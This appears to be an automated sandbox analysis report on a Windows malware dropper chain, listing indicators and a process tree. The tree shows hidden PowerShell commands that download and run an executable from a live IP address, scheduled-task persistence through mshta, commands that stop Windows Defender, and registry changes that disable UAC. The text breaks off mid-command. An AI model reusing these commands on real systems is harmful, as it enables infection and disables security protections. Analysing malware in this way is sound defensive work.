\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe -
Runs net.exe
-
Scheduled Task/Job: Scheduled Task 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 7352 schtasks.exe 6108 schtasks.exe 5712 schtasks.exe 1188 schtasks.exe 4276 schtasks.exe -
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 98 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 9480 explorer.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1804 powershell.exe 1804 powershell.exe 4676 TempGYPZVOSSEJNVINDR57JARJ63OJEXIJ86.EXE 4676 TempGYPZVOSSEJNVINDR57JARJ63OJEXIJ86.EXE 3596 rapes.exe 3596 rapes.exe 1928 powershell.exe 1928 powershell.exe 1404 powershell.exe 1404 powershell.exe 2856 Temp0GPCTYRPMJH9KQSH8XBLB6P1DNIGPK6E.EXE 2856 Temp0GPCTYRPMJH9KQSH8XBLB6P1DNIGPK6E.EXE 3876 powershell.exe 3876 powershell.exe 1376 powershell.exe 1376 powershell.exe 3308 powershell.exe 3308 powershell.exe 5096 powershell.exe 5096 powershell.exe 5328 MSBuild.exe 5328 MSBuild.exe 5328 MSBuild.exe 5328 MSBuild.exe 3732 483d2fa8a0d53818306efeb32d3.exe 3732 483d2fa8a0d53818306efeb32d3.exe 5328 MSBuild.exe 5328 MSBuild.exe 5328 MSBuild.exe 5328 MSBuild.exe 4708 powershell.exe 4708 powershell.exe 2268 rapes.exe 2268 rapes.exe 2444 powershell.exe 2444 powershell.exe 12908 HmngBpR.exe 12908 HmngBpR.exe 13032 SplashWin.exe 13144 SplashWin.exe 13144 SplashWin.exe 13144 SplashWin.exe 13240 cmd.exe 13240 cmd.exe 4720 Seat.com 4720 Seat.com 4720 Seat.com 4720 Seat.com 4720 Seat.com 4720 Seat.com 4720 Seat.com 4720 Seat.com 4720 Seat.com 4720 Seat.com 4720 Seat.com 4720 Seat.com 4720 Seat.com 4720 Seat.com 4720 Seat.com 4720 Seat.com 4720 Seat.com 4720 Seat.com 4720 Seat.com 4720 Seat.com -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 9480 explorer.exe -
Suspicious behavior: MapViewOfSection 10 IoCs
pid Process 1916 h2wb5_002.exe 1916 h2wb5_002.exe 1916 h2wb5_002.exe 13144 SplashWin.exe 13240 cmd.exe 6764 ShortcutTaskAgent.exe 8004 8sb9w_003.exe 8004 8sb9w_003.exe 8004 8sb9w_003.exe 5096 cmd.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1804 powershell.exe Token: SeDebugPrivilege 1928 powershell.exe Token: SeDebugPrivilege 1404 powershell.exe Token: SeDebugPrivilege 3876 powershell.exe Token: SeDebugPrivilege 752 XW3ITet.exe Token: SeDebugPrivilege 1376 powershell.exe Token: SeDebugPrivilege 3308 powershell.exe Token: SeDebugPrivilege 5096 powershell.exe Token: SeIncreaseQuotaPrivilege 1376 powershell.exe Token: SeSecurityPrivilege 1376 powershell.exe Token: SeTakeOwnershipPrivilege 1376 powershell.exe Token: SeLoadDriverPrivilege 1376 powershell.exe Token: SeSystemProfilePrivilege 1376 powershell.exe Token: SeSystemtimePrivilege 1376 powershell.exe Token: SeProfSingleProcessPrivilege 1376 powershell.exe Token: SeIncBasePriorityPrivilege 1376 powershell.exe Token: SeCreatePagefilePrivilege 1376 powershell.exe Token: SeBackupPrivilege 1376 powershell.exe Token: SeRestorePrivilege 1376 powershell.exe Token: SeShutdownPrivilege 1376 powershell.exe Token: SeDebugPrivilege 1376 powershell.exe Token: SeSystemEnvironmentPrivilege 1376 powershell.exe Token: SeRemoteShutdownPrivilege 1376 powershell.exe Token: SeUndockPrivilege 1376 powershell.exe Token: SeManageVolumePrivilege 1376 powershell.exe Token: 33 1376 powershell.exe Token: 34 1376 powershell.exe Token: 35 1376 powershell.exe Token: 36 1376 powershell.exe Token: SeIncreaseQuotaPrivilege 1376 powershell.exe Token: SeSecurityPrivilege 1376 powershell.exe Token: SeTakeOwnershipPrivilege 1376 powershell.exe Token: SeLoadDriverPrivilege 1376 powershell.exe Token: SeSystemProfilePrivilege 1376 powershell.exe Token: SeSystemtimePrivilege 1376 powershell.exe Token: SeProfSingleProcessPrivilege 1376 powershell.exe Token: SeIncBasePriorityPrivilege 1376 powershell.exe Token: SeCreatePagefilePrivilege 1376 powershell.exe Token: SeBackupPrivilege 1376 powershell.exe Token: SeRestorePrivilege 1376 powershell.exe Token: SeShutdownPrivilege 1376 powershell.exe Token: SeDebugPrivilege 1376 powershell.exe Token: SeSystemEnvironmentPrivilege 1376 powershell.exe Token: SeRemoteShutdownPrivilege 1376 powershell.exe Token: SeUndockPrivilege 1376 powershell.exe Token: SeManageVolumePrivilege 1376 powershell.exe Token: 33 1376 powershell.exe Token: 34 1376 powershell.exe Token: 35 1376 powershell.exe Token: 36 1376 powershell.exe Token: SeIncreaseQuotaPrivilege 1376 powershell.exe Token: SeSecurityPrivilege 1376 powershell.exe Token: SeTakeOwnershipPrivilege 1376 powershell.exe Token: SeLoadDriverPrivilege 1376 powershell.exe Token: SeSystemProfilePrivilege 1376 powershell.exe Token: SeSystemtimePrivilege 1376 powershell.exe Token: SeProfSingleProcessPrivilege 1376 powershell.exe Token: SeIncBasePriorityPrivilege 1376 powershell.exe Token: SeCreatePagefilePrivilege 1376 powershell.exe Token: SeBackupPrivilege 1376 powershell.exe Token: SeRestorePrivilege 1376 powershell.exe Token: SeShutdownPrivilege 1376 powershell.exe Token: SeDebugPrivilege 1376 powershell.exe Token: SeSystemEnvironmentPrivilege 1376 powershell.exe -
Suspicious use of FindShellTrayWindow 10 IoCs
pid Process 516 853f95bab9db7017804bee01b1d328370a48c803a3247d761fdda987dd654373.exe 516 853f95bab9db7017804bee01b1d328370a48c803a3247d761fdda987dd654373.exe 516 853f95bab9db7017804bee01b1d328370a48c803a3247d761fdda987dd654373.exe 2480 2af4a002ad.exe 2480 2af4a002ad.exe 2480 2af4a002ad.exe 4024 zY9sqWs.exe 4720 Seat.com 4720 Seat.com 4720 Seat.com -
Suspicious use of SendNotifyMessage 9 IoCs
pid Process 516 853f95bab9db7017804bee01b1d328370a48c803a3247d761fdda987dd654373.exe 516 853f95bab9db7017804bee01b1d328370a48c803a3247d761fdda987dd654373.exe 516 853f95bab9db7017804bee01b1d328370a48c803a3247d761fdda987dd654373.exe 2480 2af4a002ad.exe 2480 2af4a002ad.exe 2480 2af4a002ad.exe 4720 Seat.com 4720 Seat.com 4720 Seat.com -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 12908 HmngBpR.exe 6728 D9ohTv4jcH.exe 9480 explorer.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 516 wrote to memory of 2108 516 853f95bab9db7017804bee01b1d328370a48c803a3247d761fdda987dd654373.exe 84 PID 516 wrote to memory of 2108 516 853f95bab9db7017804bee01b1d328370a48c803a3247d761fdda987dd654373.exe 84 PID 516 wrote to memory of 2108 516 853f95bab9db7017804bee01b1d328370a48c803a3247d761fdda987dd654373.exe 84 PID 516 wrote to memory of 4988 516 853f95bab9db7017804bee01b1d328370a48c803a3247d761fdda987dd654373.exe 85 PID 516 wrote to memory of 4988 516 853f95bab9db7017804bee01b1d328370a48c803a3247d761fdda987dd654373.exe 85 PID 516 wrote to memory of 4988 516 853f95bab9db7017804bee01b1d328370a48c803a3247d761fdda987dd654373.exe 85 PID 2108 wrote to memory of 5712 2108 cmd.exe 87 PID 2108 wrote to memory of 5712 2108 cmd.exe 87 PID 2108 wrote to memory of 5712 2108 cmd.exe 87 PID 4988 wrote to memory of 1804 4988 mshta.exe 89 PID 4988 wrote to memory of 1804 4988 mshta.exe 89 PID 4988 wrote to memory of 1804 4988 mshta.exe 89 PID 1804 wrote to memory of 4676 1804 powershell.exe 91 PID 1804 wrote to memory of 4676 1804 powershell.exe 91 PID 1804 wrote to memory of 4676 1804 powershell.exe 91 PID 4676 wrote to memory of 3596 4676 TempGYPZVOSSEJNVINDR57JARJ63OJEXIJ86.EXE 92 PID 4676 wrote to memory of 3596 4676 TempGYPZVOSSEJNVINDR57JARJ63OJEXIJ86.EXE 92 PID 4676 wrote to memory of 3596 4676 TempGYPZVOSSEJNVINDR57JARJ63OJEXIJ86.EXE 92 PID 3596 wrote to memory of 2480 3596 rapes.exe 93 PID 3596 wrote to memory of 2480 3596 rapes.exe 93 PID 3596 wrote to memory of 2480 3596 rapes.exe 93 PID 2480 wrote to memory of 5544 2480 2af4a002ad.exe 94 PID 2480 wrote to memory of 5544 2480 2af4a002ad.exe 94 PID 2480 wrote to memory of 5544 2480 2af4a002ad.exe 94 PID 2480 wrote to memory of 652 2480 2af4a002ad.exe 95 PID 2480 wrote to memory of 652 2480 2af4a002ad.exe 95 PID 2480 wrote to memory of 652 2480 2af4a002ad.exe 95 PID 5544 wrote to memory of 1188 5544 cmd.exe 97 PID 5544 wrote to memory of 1188 5544 cmd.exe 97 PID 5544 wrote to memory of 1188 5544 cmd.exe 97 PID 652 wrote to memory of 1928 652 mshta.exe 98 PID 652 wrote to memory of 1928 652 mshta.exe 98 PID 652 wrote to memory of 1928 652 mshta.exe 98 PID 3596 wrote to memory of 6136 3596 rapes.exe 100 PID 3596 wrote to memory of 6136 3596 rapes.exe 100 PID 3596 wrote to memory of 6136 3596 rapes.exe 100 PID 6136 wrote to memory of 5688 6136 cmd.exe 102 PID 6136 wrote to memory of 5688 6136 cmd.exe 102 PID 6136 wrote to memory of 5688 6136 cmd.exe 102 PID 6136 wrote to memory of 3608 6136 cmd.exe 103 PID 6136 wrote to memory of 3608 6136 cmd.exe 103 PID 6136 wrote to memory of 3608 6136 cmd.exe 103 PID 3608 wrote to memory of 1404 3608 cmd.exe 104 PID 3608 wrote to memory of 1404 3608 cmd.exe 104 PID 3608 wrote to memory of 1404 3608 cmd.exe 104 PID 1928 wrote to memory of 2856 1928 powershell.exe 105 PID 1928 wrote to memory of 2856 1928 powershell.exe 105 PID 1928 wrote to memory of 2856 1928 powershell.exe 105 PID 3596 wrote to memory of 752 3596 rapes.exe 106 PID 3596 wrote to memory of 752 3596 rapes.exe 106 PID 3596 wrote to memory of 752 3596 rapes.exe 106 PID 6136 wrote to memory of 3440 6136 cmd.exe 107 PID 6136 wrote to memory of 3440 6136 cmd.exe 107 PID 6136 wrote to memory of 3440 6136 cmd.exe 107 PID 3440 wrote to memory of 3876 3440 cmd.exe 108 PID 3440 wrote to memory of 3876 3440 cmd.exe 108 PID 3440 wrote to memory of 3876 3440 cmd.exe 108 PID 752 wrote to memory of 1376 752 XW3ITet.exe 109 PID 752 wrote to memory of 1376 752 XW3ITet.exe 109 PID 752 wrote to memory of 1376 752 XW3ITet.exe 109 PID 6136 wrote to memory of 2376 6136 cmd.exe 111 PID 6136 wrote to memory of 2376 6136 cmd.exe 111 PID 6136 wrote to memory of 2376 6136 cmd.exe 111 PID 2376 wrote to memory of 3308 2376 cmd.exe 112 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\consentpromptbehavioradmin = "0" D9ohTv4jcH.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\enablelua = "0" D9ohTv4jcH.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\promptonsecuredesktop = "0" D9ohTv4jcH.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:680
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)}2⤵
- Modifies Windows Defender DisableAntiSpyware settings
- Command and Scripting Interpreter: PowerShell
- Modifies data under HKEY_USERS
PID:9956 -
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" qc windefend3⤵
- Launches sc.exe
PID:11064
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"3⤵PID:11180
-
-
C:\Windows\system32\whoami.exe"C:\Windows\system32\whoami.exe" /groups3⤵PID:11476
-
-
C:\Windows\system32\net1.exe"C:\Windows\system32\net1.exe" stop windefend3⤵PID:11548
-
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" config windefend depend= RpcSs-TOGGLE3⤵
- Launches sc.exe
PID:11664
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)}2⤵
- Modifies Windows Defender DisableAntiSpyware settings
- Modifies Windows Defender Real-time Protection settings
- Command and Scripting Interpreter: PowerShell
- Modifies data under HKEY_USERS
PID:10112 -
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" qc windefend3⤵
- Launches sc.exe
PID:11008
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"3⤵PID:11128
-
-
C:\Windows\system32\whoami.exe"C:\Windows\system32\whoami.exe" /groups3⤵PID:11436
-
-
C:\Windows\system32\net1.exe"C:\Windows\system32\net1.exe" stop windefend3⤵PID:11528
-
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" config windefend depend= RpcSs-TOGGLE3⤵
- Launches sc.exe
PID:4500
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)}2⤵
- Modifies Windows Defender DisableAntiSpyware settings
- Command and Scripting Interpreter: PowerShell
- Modifies data under HKEY_USERS
PID:10372 -
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" qc windefend3⤵
- Launches sc.exe
PID:2396
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"3⤵PID:11328
-
-
C:\Windows\system32\whoami.exe"C:\Windows\system32\whoami.exe" /groups3⤵PID:11608
-
-
C:\Windows\system32\net1.exe"C:\Windows\system32\net1.exe" stop windefend3⤵PID:11680
-
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" config windefend depend= RpcSs-TOGGLE3⤵
- Launches sc.exe
PID:11784
-
-
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3460
-
C:\Users\Admin\AppData\Local\Temp\853f95bab9db7017804bee01b1d328370a48c803a3247d761fdda987dd654373.exe"C:\Users\Admin\AppData\Local\Temp\853f95bab9db7017804bee01b1d328370a48c803a3247d761fdda987dd654373.exe"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:516 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn Gm33FmaqXss /tr "mshta C:\Users\Admin\AppData\Local\Temp\9deJ47dg1.hta" /sc minute /mo 25 /ru "Admin" /f3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2108 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn Gm33FmaqXss /tr "mshta C:\Users\Admin\AppData\Local\Temp\9deJ47dg1.hta" /sc minute /mo 25 /ru "Admin" /f4⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:5712
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\9deJ47dg1.hta3⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4988 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'GYPZVOSSEJNVINDR57JARJ63OJEXIJ86.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1804 -
C:\Users\Admin\AppData\Local\TempGYPZVOSSEJNVINDR57JARJ63OJEXIJ86.EXE"C:\Users\Admin\AppData\Local\TempGYPZVOSSEJNVINDR57JARJ63OJEXIJ86.EXE"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4676 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3596 -
C:\Users\Admin\AppData\Local\Temp\10205910101\2af4a002ad.exe"C:\Users\Admin\AppData\Local\Temp\10205910101\2af4a002ad.exe"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2480 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn 4jYPemaEqnr /tr "mshta C:\Users\Admin\AppData\Local\Temp\wzqo7paNC.hta" /sc minute /mo 25 /ru "Admin" /f8⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5544 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn 4jYPemaEqnr /tr "mshta C:\Users\Admin\AppData\Local\Temp\wzqo7paNC.hta" /sc minute /mo 25 /ru "Admin" /f9⤵
- Scheduled Task/Job: Scheduled Task
PID:1188
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\wzqo7paNC.hta8⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:652 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'0GPCTYRPMJH9KQSH8XBLB6P1DNIGPK6E.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;9⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1928 -
C:\Users\Admin\AppData\Local\Temp0GPCTYRPMJH9KQSH8XBLB6P1DNIGPK6E.EXE"C:\Users\Admin\AppData\Local\Temp0GPCTYRPMJH9KQSH8XBLB6P1DNIGPK6E.EXE"10⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2856
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10205920121\am_no.cmd" "7⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:6136 -
C:\Windows\SysWOW64\timeout.exetimeout /t 28⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:5688
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"8⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3608 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"9⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1404
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"8⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3440 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"9⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3876
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"8⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2376 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"9⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3308
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "eYWh6maWFoE" /tr "mshta \"C:\Temp\rn351DwMk.hta\"" /sc minute /mo 25 /ru "Admin" /f8⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:4276
-
-
C:\Windows\SysWOW64\mshta.exemshta "C:\Temp\rn351DwMk.hta"8⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:6044 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;9⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5096 -
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"10⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3732
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10206330101\XW3ITet.exe"C:\Users\Admin\AppData\Local\Temp\10206330101\XW3ITet.exe"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:752 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -NoProfile -ExecutionPolicy Bypass -Enc 